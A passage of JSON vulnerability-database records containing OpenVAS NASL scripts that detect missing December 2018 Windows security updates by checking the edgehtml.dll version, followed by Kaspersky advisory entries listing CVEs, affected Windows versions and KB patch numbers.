2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:03:10 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471327)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471327\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - Connected User Experiences and Telemetry Service fails to validate\n certain function values.\n\n - Internet Explorer VBScript execution policy does not properly\n restrict VBScript under specific conditions.\n\n - Windows GDI component improperly discloses the contents of its\n memory.\n\n - Scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - VBScript engine improperly handles objects in memory.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in the memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, obtain sensitive information, deny dependent\n security feature functionality, gain elevated privileges and could take control\n of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released 
updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471327\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1505\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1505\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8612", "CVE-2018-8618", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8624", "CVE-2018-8583", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8517", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471329", "modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814615", 
"href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814615", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471329)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471329)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814615\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8517\", \"CVE-2018-8540\",\n \"CVE-2018-8596\", \"CVE-2018-8599\", \"CVE-2018-8611\", \"CVE-2018-8612\",\n \"CVE-2018-8617\", \"CVE-2018-8618\", \"CVE-2018-8619\", \"CVE-2018-8624\",\n \"CVE-2018-8625\", \"CVE-2018-8626\", \"CVE-2018-8629\", \"CVE-2018-8631\",\n \"CVE-2018-8634\", \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\",\n \"CVE-2018-8583\", \"CVE-2018-8595\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 
+0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:50:45 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471329)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471329\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Connected User Experiences and Telemetry Service fails to validate\n certain function values.\n\n - Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - Internet Explorer VBScript execution policy does not properly restrict\n VBScript under specific conditions.\n\n - VBScript engine improperly handles objects in memory.\n\n - Windows Domain Name System (DNS) servers fail to properly handle\n requests.\n\n - Scripting engine handles objects in memory in Internet Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in the memory.\n\n - Internet Explorer improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, deny dependent security feature\n functionality, obtain sensitive information, cause denial of service and could\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 
for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471329\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.845\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.845\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:57:18", "bulletinFamily": "info", "cvelist": ["CVE-2018-8621", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "### *Detect date*:\n12/11/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2012 \nInternet Explorer 11 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 
32-bit Systems \nInternet Explorer 10 \nWindows Server 2012 R2 \nWindows Server 2019\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8611](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8611>) \n[CVE-2018-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8477>) \n[CVE-2018-8619](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8619>) \n[CVE-2018-8643](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8643>) \n[CVE-2018-8641](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8641>) \n[CVE-2018-8596](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8596>) \n[CVE-2018-8514](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8514>) \n[CVE-2018-8639](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8639>) \n[CVE-2018-8595](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8595>) \n[CVE-2018-8621](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8621>) \n[CVE-2018-8622](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8622>) \n[CVE-2018-8625](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8625>) \n[CVE-2018-8631](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8631>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8622>)0.0Unknown \n[CVE-2018-8641](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8641>)0.0Unknown 
\n[CVE-2018-8639](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8639>)0.0Unknown \n[CVE-2018-8596](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8596>)0.0Unknown \n[CVE-2018-8611](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8611>)0.0Unknown \n[CVE-2018-8621](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8621>)0.0Unknown \n[CVE-2018-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8477>)0.0Unknown \n[CVE-2018-8514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8514>)0.0Unknown \n[CVE-2018-8595](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8595>)0.0Unknown \n[CVE-2018-8643](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8643>)0.0Unknown \n[CVE-2018-8631](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8631>)0.0Unknown \n[CVE-2018-8625](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8625>)0.0Unknown \n[CVE-2018-8619](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8619>)0.0Unknown\n\n### *KB list*:\n[4471319](<http://support.microsoft.com/kb/4471319>) \n[4471328](<http://support.microsoft.com/kb/4471328>) \n[4471318](<http://support.microsoft.com/kb/4471318>) \n[4471325](<http://support.microsoft.com/kb/4471325>) \n[4470199](<http://support.microsoft.com/kb/4470199>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2018-12-11T00:00:00", "id": "KLA11884", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11884", "title": "\r KLA11884Multiple vulnerability in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:57:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1481", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1480", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], 
"description": "### *Detect date*:\n12/10/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 
Version 1803 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1470>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1465](<https://nvd.nist.gov/vuln/detail/CVE-2019-1465>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1478>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1480](<https://nvd.nist.gov/vuln/detail/CVE-2019-1480>) \n[CVE-2019-1481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1481>) \n[CVE-2019-1485](<https://nvd.nist.gov/vuln/detail/CVE-2019-1485>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) 
\n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1484>)0.0Unknown \n[CVE-2019-1488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1488>)0.0Unknown \n[CVE-2019-1470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1470>)0.0Unknown \n[CVE-2019-1453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1453>)0.0Unknown \n[CVE-2019-1465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1465>)0.0Unknown \n[CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>)0.0Unknown \n[CVE-2019-1474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1474>)0.0Unknown \n[CVE-2019-1481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1481>)0.0Unknown \n[CVE-2019-1480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1480>)0.0Unknown \n[CVE-2019-1467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1467>)0.0Unknown \n[CVE-2019-1468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1468>)0.0Unknown \n[CVE-2019-1478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1478>)0.0Unknown \n[CVE-2019-1466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1466>)0.0Unknown \n[CVE-2019-1485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1485>)0.0Unknown\n\n### *KB list*:\n[4530695](<http://support.microsoft.com/kb/4530695>) \n[4530734](<http://support.microsoft.com/kb/4530734>) \n[4530719](<http://support.microsoft.com/kb/4530719>) \n[4530692](<http://support.microsoft.com/kb/4530692>) \n[4530677](<http://support.microsoft.com/kb/4530677>)\n\n### *Microsoft official advisories*:", "edition": 1, 
"modified": "2020-07-22T00:00:00", "published": "2019-12-10T00:00:00", "id": "KLA11862", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11862", "title": "\r KLA11862Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:03:35", "bulletinFamily": "info", "cvelist": ["CVE-2018-8649", "CVE-2018-8634", "CVE-2018-8621", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8612", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8599", "CVE-2018-8514", "CVE-2018-8638", "CVE-2018-8637", "CVE-2018-8477"], "description": "### *Detect date*:\n12/11/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, cause denial of service, obtain sensitive information, execute arbitrary code.\n\n### *Affected products*:\nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 \nWindows RT 8.1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 
8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1709 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8599](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8599>) \n[CVE-2018-8649](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8649>) \n[CVE-2018-8622](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8622>) \n[CVE-2018-8641](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8641>) \n[CVE-2018-8639](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8639>) \n[CVE-2018-8637](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8637>) \n[CVE-2018-8596](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8596>) \n[CVE-2018-8611](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8611>) \n[CVE-2018-8621](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8621>) \n[CVE-2018-8638](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8638>) 
\n[CVE-2018-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8477>) \n[CVE-2018-8514](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8514>) \n[CVE-2018-8595](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8595>) \n[CVE-2018-8612](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8612>) \n[CVE-2018-8634](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8634>) \n[CVE-2018-8626](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8626>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-8599](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8599>)0.0Unknown \n[CVE-2018-8649](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8649>)0.0Unknown \n[CVE-2018-8622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8622>)0.0Unknown \n[CVE-2018-8641](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8641>)0.0Unknown \n[CVE-2018-8639](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8639>)0.0Unknown \n[CVE-2018-8637](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8637>)0.0Unknown \n[CVE-2018-8596](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8596>)0.0Unknown \n[CVE-2018-8611](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8611>)0.0Unknown \n[CVE-2018-8621](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8621>)0.0Unknown \n[CVE-2018-8638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8638>)0.0Unknown \n[CVE-2018-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8477>)0.0Unknown \n[CVE-2018-8514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8514>)0.0Unknown \n[CVE-2018-8595](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8595>)0.0Unknown 
\n[CVE-2018-8612](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8612>)0.0Unknown \n[CVE-2018-8634](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8634>)0.0Unknown \n[CVE-2018-8626](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8626>)0.0Unknown\n\n### *KB list*:\n[4471329](<http://support.microsoft.com/kb/4471329>) \n[4471323](<http://support.microsoft.com/kb/4471323>) \n[4471324](<http://support.microsoft.com/kb/4471324>) \n[4471327](<http://support.microsoft.com/kb/4471327>) \n[4471321](<http://support.microsoft.com/kb/4471321>) \n[4471332](<http://support.microsoft.com/kb/4471332>) \n[4471320](<http://support.microsoft.com/kb/4471320>) \n[4471322](<http://support.microsoft.com/kb/4471322>) \n[4471326](<http://support.microsoft.com/kb/4471326>) \n[4471330](<http://support.microsoft.com/kb/4471330>)\n\n### *Microsoft official advisories*:\n\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 12, "modified": "2020-07-22T00:00:00", "published": "2018-12-11T00:00:00", "id": "KLA11385", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11385", "title": "\r KLA11385Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:27", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1483", "CVE-2019-1469", "CVE-2019-1471", 